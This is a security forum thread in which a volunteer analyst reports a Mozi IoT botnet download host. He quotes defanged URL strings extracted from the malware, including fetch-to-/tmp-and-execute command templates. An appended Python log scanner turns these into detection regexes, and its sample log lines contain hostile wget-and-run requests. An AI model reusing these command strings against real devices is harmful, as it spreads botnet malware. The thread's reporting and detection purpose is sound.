Avast WEBforum

Other => Viruses and worms => Topic started by: polonus on May 09, 2021, 01:48:15 PM

Title: Only one to report this malware download?
Post by: polonus on May 09, 2021, 01:48:15 PM
See: https://urlhaus.abuse.ch/url/1212440/
One to report: https://www.virustotal.com/gui/ip-address/101.180.105.163/detection
Now also reported here: https://ip-46.com/101.180.105.163#ip-feeds

Mozi has been designed specifically to attack low-power smart devices. Once installed, the malware tries to make contact with other infected devices, adding itself to the Mozi botnet. Once registered, the infected device continues to
According to the report, the Mozi botnet malware targets devices that use MIPS and ARM processors – both of which are very common in low-power smart home hardware. It also infects wireless routers.

DHT node on various addresses: https://www.shodan.io/search?query=101.180.105.163

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

Title: Re: Only one to report this malware download?
Post by: polonus on May 10, 2021, 12:23:30 AM
Here the malcode URI's workings are being confirmed by running a URL extractor on it:
Quote
-http://%s:%d
-http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
-http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
-http://%s:%d/Mozi.a;sh
-http://%s:%d/Mozi.m
-http://%s:%d/Mozi.m+-O+-
-http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
-http://%s:%d/Mozi.m;/tmp/Mozi.m
-http://%s:%d/bin.sh
-http://%s:%d/bin.sh;chmod
-http://%s:%d/i
-http://%s:%d/i;chmod
-http://127.0.0.1
-http://baidu.com/%s/%s/%d/%s/%s/%s/%s) kicking up a search error
-http://ipinfo.io/ip
-http://purenetworks.com/HNAP1/
-http://schemas.xmlsoap.org/soap/encoding/
-http://schemas.xmlsoap.org/soap/envelope/
-http://schemas.xmlsoap.org/soap/envelope//
-http://www.w3.org/2001/XMLSchema
-http://www.w3.org/2001/XMLSchema-instance
All links blocked by me with a leading - for obvious reasons.

polonus
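As an added example (not polonus's code and not from the original post), a small Python scanner that turns the extracted download-and-execute templates quoted above into detection rules and runs them over web-server access-log lines; the log lines, the 192.0.2.x / 203.0.113.x addresses and the /example.cgi path are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original post); 192.0.2.0/24 and
# 203.0.113.0/24 are documentation ranges and /example.cgi is a placeholder path.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2021:12:01:05 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.9 - - [10/May/2021:12:01:09 +0000] "GET /example.cgi?cmd=wget+http://192.0.2.10:5555/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.1" 404 0
203.0.113.9 - - [10/May/2021:12:01:12 +0000] "GET /example.cgi?cmd=wget+http://192.0.2.10:5555/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 0
203.0.113.7 - - [10/May/2021:12:02:00 +0000] "GET /blog/mozilla-tips.html HTTP/1.1" 200 2048
"""

# Each rule is (name, regex over the URL-decoded request URI). The patterns are
# taken from the Mozi URL templates quoted above, where '+' stands for a space.
RULES = [
    # known Mozi dropper/loader filenames as a path component
    ("mozi-payload-name", re.compile(r"/(?:Mozi\.[am]|bin\.sh)(?:[;\s&]|$)")),
    # "-O /tmp/netgear;sh netgear": fetch into /tmp, then hand it to a shell
    ("fetch-to-tmp-then-exec", re.compile(r"-O\s+/tmp/\S+?\s*;\s*(?:sh\b|/tmp/)")),
    # "chmod 777 Mozi.a;/tmp/Mozi.a": mark executable, then run from /tmp
    ("chmod-then-run-from-tmp", re.compile(r"chmod\s+\d{3}\s+\S+?\s*;\s*/tmp/\S+")),
    # router-CGI tail that the netgear template carries
    ("router-cgi-persist-flag", re.compile(r"curpath=/&currentsetting\.htm=1")),
]

# Common/Combined log format request field: "METHOD URI HTTP/x.y"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')

def scan_line(line):
    """Return the names of the rules that fire on one access-log line."""
    m = LOG_RE.search(line)
    if not m:
        return []
    uri = unquote_plus(m.group("uri"))  # '+' -> ' ', %XX -> byte, as a CGI would decode it
    return [name for name, rx in RULES if rx.search(uri)]

def scan_log(text):
    """Return [(line_number, [rule names])] for every line that matched."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            findings.append((n, hits))
    return findings

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

Decoding the URI before matching matters: the templates arrive with `+` in place of spaces, so a rule written against the raw request would miss them.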
Title: Re: Only one to report this malware download?
Post by: polonus on May 10, 2021, 03:45:16 PM
And some attackers use UPX as a compressor of malware to bypass detection*:

Quote
-http://%s?o??:%d/Mo?.m+-O
-http://upx.sf.net  *
GET /-Mo?.m+-O HTTP/1.0
Host: -%s?o??:%d
User-Agent: Malzilla original browser
Referer: -http://%s?o??:%d/Mo?.m+-O
Accept-Encoding: gzip
Normally one should get a 400 Bad Request.

polonus
Title: Re: Only one to report this malware download?
Post by: polonus on May 10, 2021, 07:46:29 PM
Here the initial malware has been cleansed apparently:
Reported -> https://urlhaus.abuse.ch/url/1217299/
Scanned for: https://sitecheck.sucuri.net/results/https/salvajeglamping.com/wp-content/js_composer_/include/params/animation_style/HMYopU9fek
Extracted were:

polonus